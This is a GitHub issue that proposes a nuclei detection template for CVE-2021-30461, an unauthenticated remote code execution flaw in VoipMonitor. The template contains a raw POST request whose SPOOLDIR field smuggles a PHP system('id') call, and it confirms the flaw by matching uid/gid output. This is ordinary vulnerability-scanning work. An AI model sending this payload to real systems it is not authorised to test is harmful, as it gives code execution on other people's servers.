### ISSUE TITLE
[nuclei-template] CVE-2021-30461

### ISSUE THREAD

**Issue by shifa123** [projectdiscovery/nuclei-templates#1422]
**Template Details**
VoipMonitor Pre-Auth-RCE, A malicious actor can trigger Un-authenticated Remote Code Execution using CVE-2021-30461

```yaml

id: CVE-2021-30461

info:
  name: VoipMonitor Pre-Auth-RCE
  author: shifacyclewala , hackergautam
  severity: critical
  description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461.
  tags: cve,cve2021,rce,voip monitor
  reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/

requests:
  - raw:
      - |
        POST /index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Connection: close
        Cookie: PHPSESSID=2f6s3f4l23qo64s4apukper2q6
        Upgrade-Insecure-Requests: 1
        Cache-Control: max-age=0
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 35

        SPOOLDIR=test%22.system%28id%29.%22

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'uid'
          - 'gid'
          - 'groups'
        condition: and
        part: body
      - type: status
        status:
          - 200

```
